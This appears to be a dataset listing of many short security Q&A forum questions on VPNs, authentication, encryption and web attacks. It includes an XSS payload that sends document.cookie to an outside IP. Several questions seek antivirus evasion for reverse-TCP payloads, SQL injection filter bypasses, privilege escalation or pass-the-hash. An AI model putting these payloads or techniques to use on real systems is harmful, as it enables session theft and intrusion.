instruction stringlengths 24 29.9k |
|---|
I'm in the process of setting up an authentication-less public VPN. To prevent against DoS attacks, I'm going to set up some sort of IP address based rate limiting. The VPN is port-bound, i.e., it will only connect to ports 80 and 443 of other sites.
(1) What sort of attacks could I expect (i) on the VPN (ii) conducted... |
I'm making a guideline for a bug bounty program and want to distinguish between bugs that require some kind of action on the target's behalf (eg clicking a suspicious link), vs vulnerabilities that can be exploited without any actions from the user (eg, SQL injection that gives you users' credentials).
I don't necessar... |
It's possible to bypass CSRF protection Referer-Based by spoof the referer in browser victim ? (POST-Based)
Hello, i try to bypass a CSRF protection Referer-Based.
I know the basic knowledge to bypass this protection, but the request is blocked.
This is a CSRF POST-Based.
I have try :
Delete the referer > return 403
... |
The sudo command has the -E option that allows users to pass through all environment variables, although it's still subject to the security policy configuration. So, is the use of -E inherently unsafe? Can someone offer a specific example of how this could be misused?
|
I strayed into the .PH TLD record on the IANA root zone database and found the first nameserver interesting.
I don't really know why they're there and I'm not in the right to assume, but considering the political climate in and between both countries (China and Philippines), it caused me a slight concern.
Could a bad a... |
The tool Responder written in Python permits to listen on a specific network card requests and automatically poisoning victims the steal hash NTLMv1 and hash NTLMv2.
The attack Pass-The-Hash permits to connect to a service like SMB.
I am a little bit confused about difference between hash LM and hash NTLM and so the co... |
I am confused about if I decided to implement DNS over TLS (DoT), would I lose DNSSEC?
Details:
I am connected with IPv4 + IPv6 Cloudflare DNS directly in my home OpenWrt router.
I love the idea of safer DNS, even if for home purposes, DNSSEC might be enough I originally thought.
But since every DNS request goes une... |
If person Y sticks his adapter device into a fixed computer, person Y will be able to bypass MAC related restrictions since the inserted device has an unknown MAC-address. How do we protect from this beside enforced policy?
Assuming the restricted host is a Windows machine.
|
I have an assignment to make an SQL injection - I found a login field that spits out an error, but I can't seem to make queries work inside of it. For your information it's an Mysql server. What is the correct syntax to execute queries and grab the admin login or login without the password?
In the first picture I tried... |
I would like to import a private key into GPG so I did:
gpg --allow-secret-key-import --import /path/to/key/key.asc
gpg: key 51D5DF493ECAFF88: "John Doe <john.doe@acme.com>" not changed
gpg: key 51D5DF493ECAFF88: secret key imported
gpg: Total number processed: 1
gpg: unchanged: 1
gpg: secret keys re... |
From the gpg manual:
--refresh-keys
Request updates from a keyserver for keys that already exist on the local keyring.
This is useful for updating a key with the latest signatures, user IDs, etc.
Calling this with no arguments will refresh the entire keyring.
But there is no claim about how secure this is.
So the que... |
While all/majority of AWS APIs requests are signed with HMAC, it is not as prevalent for other APIs in general.
Most likely, the reason is because of the gotchas involved when client has to make the signed API work as they may miss a few headers etc or new headers got added by proxies and so signatures don't match etc.... |
On a W3Schools page, I found that HTTP requests work like this:
A client (a browser) sends an HTTP request to the web
A web server receives the request, and runs an application to process it
The server returns an HTTP response (output) to the browser
The client (the browser) receives the response.
On the same page I ... |
As far as I can tell, scheduled tasks may only be created by those in the Administrators group by default. Does that mean that persistence can't be achieved via this method without gaining elevated privileges?
|
After stumbling upon some unknown folders in my unused OneDrive (posted question), I did some digging arround and found some interesting logs. Apparently, OpenSSH had been used for remote access on my machine. A description of the attack can be here https://az4n6.blogspot.com/2020/02/detecting-laterial-movment-with-win... |
I'm sure I'm not the only one who is scared to death to blindly trust random strangers with all my data. Which is the case in practice if, for example, I'm to use this library right now, which I'm about to: https://github.com/jfcherng/php-diff
It is impossible for me to know if this (or any other library) does only wha... |
I do know the difference between brute force attack and DOS.
What if a web server doesn't have account lock out in place and a few brute force attacks is being started in parallel, and these attacks will keep web server CPU intensively busy. Will these attacks in the end reduce the abilities of web server to serve othe... |
I am attempting to determine whether it would be possible to maintain your anonymity while using an internet-connected PC infected with ring 0 malware. The threat model assumes the adversary is willing to purchase zero-day exploits and craft malware specifically targeting the victim in question.
Furthermore, I am assum... |
OpenSSL keeps the structure CMS_ContentInfo opaque and in the case of enveloped data generates and manages the content-encryption key completely by itself. It is not possible to provide a content-encryption key generated by yourself.
In contrast to that Bouncy Castle allows a more individual content-encryption key mana... |
CVE-2020-16898 is a remote code execution vulnerability caused by the improper handling of ICMPv6 Router Advertisement packets by Windows TCP/IP stack. Microsoft's recommended workaround is to disable ICMPv6 RDNSS component.
My question is: In my system, I already had TCP/IPv6 unchecked in my network adaptor options, i... |
I am participating in a project that involves a JavaScript SPA that provides a service and is intended to interact via REST APIs with one of our servers. Initially, I proposed to work on the two entities as two separate projects; specifically I put forth the following
The user accesses the Web app through a www.myserv... |
We are encrypting database fields for PII. For Key Generation and storing it, we are using AWS KMS. Data key we have generated using AWS KMS,for the master key we are using CMKs.
Now let's say there is only one DB field that I want to encrypt which is email.
Also, for simplicity, let's consider we have two environment ... |
Assuming that I have no ability to use sudo and rather limited permissions, but I have a shell script exploit that allows to me change the file ownership of a file to the current user by running a buggy program written in C that has root permissions. Specifically, the execlp() function is what is being exploited as I h... |
I'm trying to do reverse tcp in an exe payload. To do antivirus evasion, I've tried to use Veil evasion, The fat rat, and also Phantom evasion, but even if the exe wasn't deleted by antivirus (I use Avast in Windows 10), the connection doesn't start. The connection starts only if the antivirus is stopped, even if the e... |
We're hosting a web site where the server processes a stream of images, generating a unique ID (uuid) for each new picture and storing various data against the ID in a MySQL database. The site is monitored through a protected dynamic (AJAX) UI, which displays a real-time stream of image previews which include the uuid ... |
I have three domains but the same code base (Domain X, Domain Y, Domain Z) and
Accounts website A
If a user tries to sign in accounts from domain X, I wanted to SSO in the other two domains (Browser Scenario: third party cookies blocked).
I tried the following approach,
Go to Accounts from Domain X
Sign In
Get the re... |
I am trying to conceptualize a server where users can upload potentially dangerous malware samples to a server. They would not need to be stored in the file system per se but kept in memory long enough to be analyzed by other programs/libraries. (Similar to: VirusTotal)
I'm not opposed to incorporating other open sourc... |
What difference we can observe when connecting using the certificate generated using the RADIUS and the credentials that we define in RADIUS like username & password.
|
I want to archive some GB of sensitive data. It is to be stored on an external drive that also includes non sensitive data so i don't want to encrypt the whole drive. For that purpose i want to use 7zip and the 7z file format with AES-256 encryption and a long (16+ character) password.
Since most of the data to be encr... |
I am currently reading the book "Web Security of Developers" and it talks about avoiding Username Enumeration, and it makes no mention of the registration/signup page for your system. I've searched the web and haven't found anything either.
It seems to me that an attacker could simply try signing up for your website wi... |
When traffic leaves the VPN, the operator of the VPN server can see the websites I'm accessing. Opera browser has a free VPN. Can I trust this VPN?
https://www.opera.com/features/free-vpn
|
IEEE 802.1X-2010 states:
"Generate an MSK of at least 64 octets, as required by IETF RFC 3748
[B14] Section 7.10, of which the first 16 or 32 octets are used by
this standard as described in 6.2.2."
RFC3748 states:
"EAP method supporting key derivation MUST export a Master Session Key
(MSK) of at least 64 octets"
B... |
I'd like to know if it's possible to have a separate certificate on a local machine, one for a heavy client and the another one for the web browser to be sure the correct client communicate with the web browser. Thanks a lot for your help.
|
I have two Windows systems, and I want to establish an encrypted TCP/IP communication between them. Specifically TLS 1.2 or TLS 1.3.
I have configured in both systems the list of allowed ciphersuites:
Win+R -> gpedit.msc which opens Local Group Policy Editor.
Local Computer Policty -> Computer Configuration -> Adminis... |
I would like to run the following script inside an input tag when the page loads.
I know how this can be fixed by using onfocus and autofocus.
But how do I get the expression document.cookie in there?
window.open('http://10.80.2.50:8000/hello.php?leak='+document.cookie);
My situation:
<input type="text" class="form-co... |
Usually the anonimity aspect of Tor is explained from the client point of view. The entry node can know who you are but cannot know which website you're accessing, and the exit node cannot know who you are.
My question is, how does it keep the host anonymous. When someone accesses a Tor website, the exit node sends the... |
I want to prevent malicious program accessing my PC via USB. My thread is as follows: I'm just a regular citizen with a non-dangerous job. However I live in a country that didn't care about data privacy and security.
Recently I just learned about the dangers of badusb. The problem is I have never checked the authentici... |
I have a web application which uses an external authentication server for obtaining a session. When a client tries to login, the browser is making requests towards the external authentication server until a cookie is obtained. Note that the client has all the API calls towards the external authentication server.
My con... |
I was testing key generation on a Hardware Security Module and I noticed that it takes so much time to generate an AES 256 secret key on the HSM.
I've used pkcs11-tool to generate the key and it took about 5 sec to complete the task:
$ pkcs11-tool --module <modules.so> --key-type aes:32 -p <PIN> --token-label SC_TEST -... |
This is the relevant part of my manifest.json file:
"content_scripts": [
{
"css": ["style.css"],
"matches": [
"<all_urls>"
],
"js": ["jquery-3.5.1.min.js", "content.js""]
}
]
I noticed that now I have jquery on every page I go to and I was wondering if it's a security concern.... |
In our multi tenant SaaS software application we intended to use Microsoft Identity Platform (Azure AD) for user authentication and providing the claims for authorization within the application. We are facing a lot of difficulties managing and getting the correct claims throughout the stack and are now considering pro... |
I used to think that this browser is safe and does not track me. Then I did little experiment - i went to specific webpage on Opera and next day I found ads for it on Facebook app. How did it happen? Does Opera send my history for ad companies?
|
There is a small confusion related to CA certificate and Local certificate. I had asked a similar question before. This time, its a little specific.
For authentication using PKI, below are the steps.
--> Get the CA certificate and load it onto the device.
-->Generate a private and public key pair
-->Request for a local... |
Last Friday, 7 of our employees' office365 email accounts were hacked simultaneously. We saw successful logins from random US addresses. The virus went through emails and basically does a reply-all with a virus called request.zip.
They all have eset running and a scan shows to be clean. They do not use the same passwor... |
I use KeePass with two factors, one being a keyfile. I would like to print the keyfile on a paper for disaster recovery.
How can I create a file that is printable on paper in such a way that I can use it to recover the keyfile? I surely have to take care that only printable characters are used, but are there more gotch... |
I want the encryptor to be able to choose a key X and using it and the public key, he will be able to encrypt a message m. Then I get the key X and using the matching private key I'm able to generate another key Y, which using it anyone can decrypt messages encrypted with X, and only with it. Is such a cryptosystem pos... |
For context, I'm assuming the attacker knows the format of the key.
Do these two keys have the same strength, or by leaving the hyphens in the key am I reducing the security by a partly-known-key attack?
A: aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa
B: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Both keys have the same amount of entro... |
Presume I'm a bad actor and want to do a naughty thing on a site protected by some 3rd party CAPTCHA solution. For instance, perhaps I'm a spammer who wants some way to script sign-ups to Hotmail.
For the target site to use CAPTCHA, it presumably must load a javascript file from the CAPTCHA provider's server. Since I'm... |
I'm currently working on a mobile application that will need to transmit a customers full card data to an internal API that will then transmit the information to an external API owned by a payment processing company I'll be working with. I've read up on the PCI DSS requirements about storing card data which seems strai... |
I have a website hosted at https://example.com/mysite. If you navigate to http://example.com/mysite, you get a 404. Everything that comes in over HTTP gets 404'd.
I was dinged on a security audit because I wasn't auto-upgrading HTTP to HTTPS. According to the bug report, my site is violating HSTS because it's not upgra... |
I am performing a security assessment on a web application and I found it doesn't have the Content-Security-Policy, but instead it has Content-Secure-Policy. It is literally the first time I'm seeing such a case and I would like to know:
Are these two headers equivalent?
Will browsers be able to recognize this Content-... |
We have a product that uses Apache HTTPD, Tomcat, and MongoDB. It uses OpenSSL for HTTPS connection and Bouncy Castle library for the encryption of data in the database.
What does it mean to be FIPS 140-2 compliant?
Is it enough to use FIPS 140-2 algorithms? Or should we get FIPS 140-2 approval?
Should we receive th... |
I want my clients to be able to schedule a purchase for a given date. When they perform this scheduling action, they are authenticated with an oauth2 token. However the date could be so far from now that the token might have expired when the purchase is triggered. I need to check the user identity and whether they stil... |
Recently, one of my servers came under attack by DDoSing it. After inspection of access logs, I can only find one common denominator: Referrer.
All of request come with (I assume) fake referrer:
https://www.baidu.com
https://www.bing.com
https://www.facebook.com
https://www.gmail.com
https://www.google.com
https://www... |
If you look up how to bypass the Android lock screen, there seems to be endless examples.
plug the phone into your PC, use ADB (Android debugging tools), disable the lock screen
forgot password option can get some recovery code sent to your email
"Emergency Call trick" was a bug in specific versions of Android that cr... |
Not just electronic voting, but in election security general.
I think it part is because there are many components to it, and it has many components that could be compromised.
What are some of the top 3 reasons why this problem is a particularly challenging problem?
|
I am the volunteer IT administrator for a local non-profit organization. The organization has a few systems - specifically security cameras, network hardware, and telephones - that have local administrator accounts to manage them. Right now, I am the only person working for the organization with any amount of technical... |
Today I found a video on YouTube that surprised me (https://www.youtube.com/watch?v=Pkc3sE6iKV4). It is by Rob Braxman, a privacy advocate with a lot of expertise.
He talks about all kinds of video conferencing situations. Like one-to-one, one-to-many and many-to-many.
It is quite obvious that one-to-many and many-to-m... |
I just had a look at the firewall status and saw it had blocked over 300 requests from TOR, Python Urllib, and some script called aabbccdd.xss.ht/pigeonburger.xyz (pigeonburger.xyz being my website).
All of them are trying to access a non-existent page on my website (/wp-admin.php).
My site is not on Wordpress, I run i... |
Suppose 1st level intermediate cert specifies DNS=www.dev.com
Can 2nd level intermediate cert which is signed by the 1st level specify DNS=*.dev.com or maybe DNS=*.dev2.com?
Does certificate level affect SAN in any way?
|
I am currently using JWT implementation for the authentication part of my APIs.
A private key is used to sign the token generated and used to make sure it's not tampered with when it's used later for other API.
My question is - What is the impact if this private key is leaked? What can the bad guy do with it?
From here... |
From the cipher suites tls_rsa_with_aes_128_cbc_sha256 and tls_ecdhe_ecdsa_with_aes_128_cbc_sha256 how do I know what will be the RSA , ECDHE, and ECDSA key support in IBM cloud Watson?
here is the link to IBM cipher suites support
|
I was wondering if there is a way to use SELECT and UNION keywords without being caught by a algorithm (see below) that filters these keywords out.
$filter = array('UNION', 'SELECT');
// Remove all banned characters
foreach ($filter as $banned) {
if (strpos($_GET['q'], $banned) !== false) die("Hacker ... |
I'd like to understand OAuth 2.0 in more detail and especially the authorization code flow. This might be nit-picking but according to RFC6749 the client initiates the flow.
(A) The client initiates the flow by directing the resource owner's
user-agent to the authorization endpoint.
But isn't it really the resource o... |
I am currently digging into OAuth 2.0 and especially the authorization code grant. What I couldn't find from within RFC6749 is if the authorization code has to follow a specific format.
The RFC says that "[...] Authorization codes operate as plaintext bearer credentials". Does that mean it is up to the authorization se... |
We have DBAs who want to access SQL DBs over DirectAccess (DA). The ask is to open port TCP 1530 over DA. At the moment, we have 6,000 people using DA, we can't filter on a specific group of DBAs. Effectively if we open the DA rules to all clients, that's 6000 individuals with access to the DBs (TCP 1530).
What's the b... |
I am doing some research for school about the Kerberos protocol and its vulnerabilities, especially the Pass the Ticket attack.
Related articles are always talking about Active Directory so I was wondering if the MIT version of Kerberos was as vulnerable as Microsoft's one ? If not, why ?
Some of these articles were a ... |
Let me quickly explain and then ask the question. I'm developing a Web Vulnerability assessment scanner for a project, and I'm learning python as I go, so forgive me if it might sound like a dumb question. The idea is to allow a user to run periodical scans against their website and report SQL injection findings, XSS v... |
Very simply we have a ton of websites at our company behind SSO.
I am having a hard time figuring out what security issues there are if we open cross-site sharing between these sites but wanted to get a broader view. This is really a result of browser updates around cross site sharing in iframes in chrome and IE a fe... |
I received a message from a friend with a link. I never clicked it, but the thumbnail image shown pretended to be an image preview for a YouTube video. Some of her other friends clicked it and it took them to a fake Facebook page where it asked them for username and password.
I always would prefer to disable such link ... |
We have a user table where we store the user passwords. Now what we do is that we have a static salt, that we append to plaintext password and do a SHA-256 of the complete text and store in DB.
We have created this approach 5 yrs back. But now with so much computing power, is it safe to use SHA-256(With the approach I ... |
What would be an attack against an insecure instance of the OTP cipher given two challenge ciphertexts using the same key in order to get the plaintext? I've tried to implement some approaches with Python but it did not work.(I'm a beginner in cyber security)
|
I just wanted to ask if my concerns here are valid.
I am aware that it is unsafe for the API to return a stack trace. I have a similar, but less egregious, situation that I am trying to judge.
Is there also some standard regarding packaging up java exceptions into a 500 response? For example, sending back such things a... |
Give that OrientDB exposes a REST HTTP API, and that it seems to have quite a few security features, what are the (especially security) implications of querying OrientDB directly from a front end web application, without writing and using an intermediary back-end between them?
What possible measures (like record access... |
I feel like I am missing an important point here, I have been reading up a bit on the PKCE flow but something doesn't sit quite right.
How is PKCE secure on public devices? If I understand this correctly if you do not control the redirect url then anyone can pretend they are your app. Suppose the redirect is localhost/... |
I've been trying to solve a box. I got into the box by exploiting a web app and got reverse shell so I was www-data. I then found an ssh key that I used to login as another user and I ran sudo -l which showed me which files I could run as root.
I'm struggling with what to do to use this to my advantage.
|
Last week one of my NEST WiFi cameras was knocked offline for about 90 seconds. Before this comms loss, we see from the video that someone was using a flashlight and walking towards the camera before losing network communication. To our dismay, we did not learn of this until the next morning when we found our vehicles ... |
As far as I understand it, the address of a v3 onion service is simply an ed25519 public key itself. Assuming the end user actually managed to acquire the legitimate 56 character .onion address (i.e. without getting phished/given a fake), would this not effectively render all MiTM attacks impossible?
|
I have a website like maindomain.com that is hosted on one IP address like 192.168.1.1. I want to add a subdomain from a different host (such as 192.168.1.2) to my root domain (maindomain.com), such that the address will be like subdomain.mainwebhost.com.
If the subdomain host has a script with a security bug, can an a... |
I'm an average user. I don't take part or have any dangerous jobs.
I know that there is no fixed solution for this type of attack. However, I think USB is still become common devices for average user. So many average users still use USB as keyboard, mouse, dongle for transferring their data from phone to PC, etc. But a... |
I can't find a definite answer on accessing cockpit from outside machines securely. Just allowing it through the firewall like that doesn't seem safe. It only uses basic user and password authentication. I think cockpit uses fail2ban to protect against brute forcing password, but is that enough?
So I thought that SSHin... |
How can I best prevent, that critical commandos (e.g. open garage door) from an IoT device are being reverse engineered from the firmware? Is the following list complete / do you spot any errors? Any comments?
Encrypt firmware patches for the device, that are available for download - cost: little – security: high
acti... |
I understand that for most package managers (pip, brew, TeX tlmgr, etc) packages are typically not audited, so there are some inherent security risks in using these package managers. Sometimes the package repositories aren't trustworthy either.
Would it be a better practice to install all packages with the --user flag?... |
Is it more secure to retrieve a client cert from their host rather than accept the cert presented in request?
Example:
B2B
Client pre-shares public cert with me
I store public cert in database
Later, client sends GET request + cert to my HTTPS endpoint
Endpoint has Enforce HTTPS and Require client certs set to true
... |
I read about the hardware protection that blocks the CPU from jumping to stack address. But hacker may still edit the return address to an address in code memory that shouldn't run at that moment.
For example;
#include<stdio.h>
void ath_secuss()
{
printf("You have successfully logged in\n");
}
... |
Assume router A, which is secure with up to date firmware, and router B, which is less secure, with no longer updated firmware.
I have one router connected to the net socket (internet source), and the other router connected to the first one via WAN. Each router has a different router IP address, and two separate wifi a... |
on linux when we have a foothold and we want to transfer files to the victim we usually transfer it to /tmp beacuse it is writable and always there.
what directory should we transfer our files if we compromise a windows machine which is usually writable and always there ?
|
I am trying to learn more about the IPSec and VPN. I am using TunnelBear on Firefox. When I start VPN service, I only see TLS connections on Wireshark but not the ISAKMP or other IPSec related packets. I did another trial with the Cisco AnyConnect client and connected to my school. Still I see TLS connections but nothi... |
I have been using a YubiKey 4 to sign git commits for a few years on Ubuntu.
I am setting up a new Windows10 machine and want to use the same signing key from Windows; however I cannot seem to point gpg at the YubiKey private signing key.
gpg --card-status shows me the keys exist on the card (albeit with an unexpected ... |
I read that when salting passwords, it is advised to use a h(pwd||salt) construction instead of h(salt||pwd), the latter being vulnerable to a length extension attack.
What are possible scenarios in which being able to extend a salted password is useful for an attacker ?
I am aware that there are better ways of storing... |
There have been numerous reports in the last week about the Chrome exploit using a bug in the FreeType library. According to reports, this bug was found on 2020-10-19.
https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html
https://securityaffairs.co/wordpress/109823/hacking/chrome-cve-... |
In general browsers attempt to establish a HTTPs-Connection if possible. How would you force a browser to fallback to HTTP when somebody enters asdf.xyz in the search bar of his/her browser without specifying a protocol?
Therefore: sslstrip is probably not helpful as there are no links to "fake". Furthermore, it is ass... |
Purpose: test if PtH (Pass the hash) is feasible against Unix box
Scenario:
Windows host (Windows Server 2008) vulnerable to eternalblue
got Administration hash as part of the post-exploitation process (meterpreter hashdump command)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3ab8988c5403e0a939927a7c70ee4360::... |
When setting up a host (... or updating its keytab if it needs new entries), what's the standard way to set up keytabs?
Looks like the MIT Kerberos docs themselves recommend using ktadmin on the host itself (... sadly, I can't find the exact page anymore to link though). However... I'd presume this involves getting an ... |
In this case a central endpoint security or SIEM solution alerts on Indicators of Compromise on one client workstation in a Windows domain.
Should there be an IT staff who has admin accounts (domain accounts) on these workstations?
Admin logs with domain account in per RDP with NTLM-Authentication (interactive logon t... |
I'm trying to help a small business transition out of an obsolete, obscure piece of software, and app support is, unfortunately, non-existent. To fully export the data for the new system, I need to be able to decrypt/decipher a string in one of the database fields. But cryptography is not my specialty and I have not be... |
It seems that the options of volatility have changed. How can I extract the memory of a process with volatility 3?
The "old way" does not seem to work:
If desired, the plugin can be used to dump contents of process memory.
vol.py -f [image] –profile=[profile] -p [PID] –dump-dir=[directory/]
The above will dump the ent... |
This is about a PHP7.4 based shopping platform (opencart (v3.0)).
For testing purposes I had a dummy set up at site.com/xyz. The admin page of that was site.com/xyz/admin. The login and pw for the admin page was also admin. I know, but the purpose of the dummy was just to check if a certain extensions and other things ... |
I have two directories in Azure. The first one contains all the customers of our company, who are registered in Azure Ad B2C. These users must be separated from the other directory, which contains employees in our company. This second directory which I mentioned, also contains resources such as Key Vaults. These key va... |
Websites that persist any user-specific state (either a login capability or, say, a basket & checkout purchasing system) tend to have a deliberately expiring session that lasts a few minutes or half an hour or so. I know these sessions are there to combat session-based attacks, and they are following official advice:
... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.